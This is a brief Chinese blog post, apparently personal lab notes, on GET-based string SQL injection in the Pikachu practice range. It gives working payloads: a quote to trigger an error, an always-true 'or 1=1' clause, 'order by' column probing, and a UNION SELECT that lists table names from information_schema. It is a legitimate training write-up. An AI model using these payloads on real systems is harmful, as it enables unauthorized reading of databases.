Pumpkin-Man

活到老_学到老!

0%

Pikachu靶场之SQL注入-GET方式

Pikachu靶场之SQL注入-GET方式

  • 打开字符型(GET)注入,在输入框中输入1,返回结果是:您输入的username不存在,请重新输入!

    • 加个单引号,返回结果报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 大概意思是语法错误,说明我们输入的单引号被带入服务器后端。

    • 输入:1' or 1=1#

      0peTns.png

    • 输入1' order by 2# 猜字段

      0pezjJ.png

    • 输入1'+union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

      0pmJgg.png

    • 可以看到表都显示在浏览器界面

后续操作与上一篇post注入类似,这里不再累述 https://lawadge.github.io/2020/09/24/pikachu%E9%9D%B6%E5%9C%BA%E4%B9%8BSQL%E6%B3%A8%E5%85%A5-post/